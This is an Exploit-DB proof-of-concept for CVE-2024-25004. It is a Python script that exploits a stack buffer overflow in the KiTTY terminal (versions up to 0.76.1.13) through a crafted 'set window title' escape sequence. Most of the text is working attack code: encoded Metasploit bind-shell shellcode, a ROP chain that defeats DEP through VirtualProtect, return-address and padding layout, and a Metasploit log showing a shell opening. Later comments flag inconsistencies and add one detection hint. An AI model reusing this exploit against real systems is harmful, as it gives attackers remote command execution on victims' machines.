KiTTY 0.76.1.13 – ‘Start Duplicated Session Username’ Buffer Overflow

  • 作者: DEFCESCO
    日期: 2024-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51891/
  • # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
    # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
    # Vendor Homepage: https://github.com/cyd01/KiTTY/
    # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
    # Version: ≤ 0.76.1.13
    # Tested on: Microsoft Windows 11/10/8/7/XP
    # CVE: CVE-2024-25004
    #-------------------------------------------------------------------------------------#
    # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > to_handler #
    # [*] Payload Handler Started as Job 1#
    # msf6 payload(windows/shell_bind_tcp) >#
    # [*] Started bind TCP handler against 192.168.100.28:4444#
    # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) # 
    #-------------------------------------------------------------------------------------#
    
    import sys
    import os
    import struct
    
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
    # windows/shell_bind_tcp - 355 bytes#
    # https://metasploit.com/ #
    # Encoder: x86/shikata_ga_nai #
    # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,#
    # PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
    # AutoVerifySession=true#
    #-------------------------------------------------------------------------------------#
    
    # Encoded windows/shell_bind_tcp stage exactly as emitted by the msfvenom
    # `generate` line above; shellcode() below appends it after a small stub.
    # NOTE(review): the generator excluded six bytes (\x00\x07\x0a\x0d\x1b\x9c),
    # while the "Badchars" comment near return_address also lists \x9d -- and
    # \x9d does occur in this buffer. The two lists disagree; confirm which
    # one actually describes the input path before relying on either.
    buf =b""
    buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
    buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
    buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
    buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
    buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
    buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
    buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
    buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
    buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
    buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
    buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
    buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
    buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
    buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
    buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
    buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
    buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
    buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
    buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
    buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
    buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
    buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
    buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
    buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
    buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
    buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
    buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
    buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
    buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
    buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
    
    
    def shellcode():
    	"""Return the fixed 1042-byte payload slot: a 14-byte ESP-adjust stub, `buf`, NOP padding.

    	The length is pinned because the layout assembled at module level
    	(return address, ROP chain, trailing jmp) is computed from the
    	"Shellcode size at ESP: 1042 bytes" figure in the comments below.
    	"""
    	sc = b'' 
    	sc += b'\xBB\x44\x24\x44\x44' # mov ebx, 0x44442444
    	sc += b'\xB8\x44\x44\x44\x44' # mov eax, 0x44444444
    	sc += b'\x29\xD8' # sub eax, ebx   -> eax = 0x2000
    	sc += b'\x29\xC4' # sub esp, eax   -> esp -= 0x2000 (presumably expressed via two constants so no immediate contains a listed bad byte -- confirm)
    	sc += buf
    	sc += b'\x90' * (1042-len(sc)) # pad to the slot size; if buf were ever longer than the slot this silently yields b''
    	assert len(sc) == 1042  # NOTE: stripped under python -O, so an oversize buf would then pass unnoticed
    	return sc
    
    
    def create_rop_chain():
    	"""Return the mona-generated ROP chain packed as little-endian 32-bit words.

    	Every entry is an absolute address inside kitty.exe (the 0.76.1.13 build
    	named in the header), so the chain presumably assumes the image is loaded
    	at its preferred base and is specific to that build. The chain reads the
    	VirtualProtect pointer out of the IAT and ends in a PUSHAD gadget, i.e.
    	it is a DEP bypass; a relocated image or any other build would break it.
    	"""
    	# rop chain generated with mona.py - www.corelan.be
    	rop_gadgets = [
    	#[---INFO:gadgets_to_set_esi:---]
    	0x004c5832,# POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
    	0x006424a4,# ptr to &VirtualProtect() [IAT kitty.exe]
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x41414141,# Filler (compensate)
    	0x00484e07,# MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
    	0x00473cf6,# XCHG EAX,ESI # RETN [kitty.exe]
    	#[---INFO:gadgets_to_set_ebp:---]
    	0x00429953,# POP EBP # RETN [kitty.exe]
    	0x005405b0,# PUSH ESP; RETN 0 [kitty.exe]
    	#[---INFO:gadgets_to_set_ebx:---]
    	0x0049d9f9,# POP EBX # RETN [kitty.exe]
    	0x00000201,# 0x00000201-> ebx
    	#[---INFO:gadgets_to_set_edx:---]
    	0x00430dce,# POP EDX # RETN [kitty.exe]
    	0x00000040,# 0x00000040-> edx
    	#[---INFO:gadgets_to_set_ecx:---]
    	0x005ac58c,# POP ECX # RETN [kitty.exe]
    	0x004d81d9,# &Writable location [kitty.exe]
    	#[---INFO:gadgets_to_set_edi:---]
    	0x004fa404,# POP EDI # RETN [kitty.exe]
    	0x005a2001,# RETN (ROP NOP) [kitty.exe]
    	#[---INFO:gadgets_to_set_eax:---]
    	0x004cd011,# POP EAX # POP EBX # RETN [kitty.exe]
    	0x90909090,# nop
    	0x41414141,# Filler (compensate)
    	#[---INFO:pushad:---]
    	0x005dfbac,# PUSHAD # RETN [kitty.exe]
    	]
    	# '<I' = little-endian unsigned 32-bit, matching the x86 stack word size.
    	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
    
    rop_chain = create_rop_chain()  # packed once at import time: 25 dwords = 100 bytes
    
    
    #----------------------------------------------------------------------------------#
    # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d #
    # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : #
    # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
    # ** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}#
    # Shellcode size at ESP: 1042 bytes#
    #----------------------------------------------------------------------------------#
    
    return_address = struct.pack('<I',0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}
    
    rop_chain_padding = b'\x90' * 27
    nops = b'\x90' * 88
    
    # The carrier is an OSC 0 "set window title" sequence (ESC ] 0 ; ... BEL)
    # whose title begins with "__dt:localhost:" -- judging by the title of this
    # advisory, the prefix KiTTY uses for its "duplicated session" feature, with
    # the over-long username part overflowing a stack buffer in the handler.
    # Defensive note: the bug is reached by the terminal *rendering* these bytes,
    # so the exposure is any output KiTTY displays; an over-long "__dt:" title
    # sequence in terminal or proxy logs is a straightforward detection, and
    # the header lists versions <= 0.76.1.13 as affected.
    escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
    escape_sequence += rop_chain_padding + rop_chain
    # E9 rel32 with rel32 = 0xFFFFFA3D = -1475 from the end of the instruction
    # (about -1470 from its start); the "-1471" in the original comment matches
    # neither convention exactly -- confirm the intended offset.
    escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
    escape_sequence += nops + b'\007'  # BEL terminates the OSC sequence
    
    # Binary handle on fd 1 so the bytes are emitted unmodified (no text
    # encoding or newline translation). Left open deliberately: os.fdopen()
    # owns the fd, so closing this object would close the process's stdout.
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()